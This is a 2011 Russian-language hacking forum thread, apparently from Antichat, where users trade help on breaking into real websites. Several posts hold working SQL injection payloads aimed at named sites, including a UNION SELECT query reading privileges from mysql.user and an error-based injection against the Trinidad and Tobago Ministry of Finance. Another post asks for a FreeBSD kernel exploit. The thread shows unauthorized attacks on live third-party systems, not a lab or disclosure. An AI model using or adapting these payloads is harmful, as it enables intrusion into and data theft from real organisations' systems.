 |
|
16.12.2011, 19:27
|
|
Новичок
Регистрация: 09.12.2011
Сообщений: 0
С нами:
7592726
Репутация:
0
|
|
В редакторе в админке при добавлении вот такого кода сохраняется вот такая штука как обойти её?
|
|
|
16.12.2011, 22:35
|
|
Новичок
Регистрация: 19.12.2008
Сообщений: 18
С нами:
9155135
Репутация:
0
|
|
есть такой скрипт http://funny-shirt.ru/cat/110/page/1
если прописать так http://funny-shirt.ru/cat/110/page/199999999999999999999999999999999999999999 вадыеш sql ошибку.
но буквы режет, цыфры принимает, помогите раскрутить
|
|
|
|
16.12.2011, 22:40
|
|
Постоянный
Регистрация: 17.09.2011
Сообщений: 390
С нами:
7712246
Репутация:
23
|
|
Сообщение от system331
есть такой скрипт http://funny-shirt.ru/cat/110/page/1
если прописать так http://funny-shirt.ru/cat/110/page/199999999999999999999999999999999999999999 вадыеш sql ошибку.
но буквы режет, цыфры принимает, помогите раскрутить
это не скуля
_http://funny-shirt.ru/cat/110/page/1*1
_http://funny-shirt.ru/cat/110/page/1*2
|
|
|
|
16.12.2011, 22:53
|
|
Постоянный
Регистрация: 17.04.2011
Сообщений: 638
С нами:
7932566
Репутация:
81
|
|
Сообщение от None
интересно, чем и как ты будешь снифать чтобы узнать что скрываеться под чпу ?
Обновим страничку (во время запущенного сниффера), и по идее, высвечивается полный адрес
|
|
|
|
16.12.2011, 23:23
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
С нами:
11322426
Репутация:
0
|
|
Сообщение от Osstudio
Обновим страничку (во время запущенного сниффера), и по идее, высвечивается полный адрес
Где найти такой сниффер? (или отсыпь хотя бы то, что ты постоянно куришь)
|
|
|
|
17.12.2011, 00:07
|
|
Новичок
Регистрация: 29.04.2010
Сообщений: 19
С нами:
8440113
Репутация:
3
|
|
Есть чтонить под
FreeBSD 8.1-RELEASE-p5 #10: Fri Sep 30 2011 ?
|
|
|
|
17.12.2011, 00:14
|
|
Познавший АНТИЧАТ
Регистрация: 09.11.2009
Сообщений: 1,077
С нами:
8686406
Репутация:
265
|
|
Сообщение от IMMORTAL_S
Есть чтонить под
FreeBSD 8.1-RELEASE-p5 #10: Fri Sep 30 2011 ?
В паблике точно нету..
|
|
|
|
17.12.2011, 15:18
|
|
Новичок
Регистрация: 11.12.2011
Сообщений: 2
С нами:
7589846
Репутация:
0
|
|
при запросе:
Сообщение от None
http://www.xxx.ru/showimg.php?id=-245+UNION+SELECT+1,2,3,4,5,6,7,8,9,file_priv+from+ mysql.user+where+user=0x6f626c61646d696e5f32--
выдается ошибка:
Сообщение от None
In module "/showimg.php" found error ="SELECT command denied to user 'u14678'@'10.8.0.28' for table 'user'" in query "select id_watch,title, fnameb, mex, korp, bras, glass, water, newe,opis from watch where id_watch=-245 UNION SELECT 1,2,3,4,5,6,7,8,9,file_priv from mysql.user where user=0x6f626c61646d696e5f32--"
что не так делаю? |
|
|
|
17.12.2011, 15:30
|
|
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
С нами:
11217866
Репутация:
3812
|
|
Сообщение от IMMORTAL_S
Есть чтонить под
FreeBSD 8.1-RELEASE-p5 #10: Fri Sep 30 2011 ?
Сообщение от RFOPlayer
что не так делаю?
а у тебя просто прав имхо нет
__________________
|
|
|
|
17.12.2011, 17:32
|
|
Постоянный
Регистрация: 29.08.2010
Сообщений: 842
С нами:
8265206
Репутация:
84
|
|
www.finance.gov.tt/publications.php?mid=192+or+1+group+by+concat(vers ion(),floor(rand(0)*2))having+min(0)+--+
Ministry of Finance, Republic of Trinidad and Tobago не хочет крититься...
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
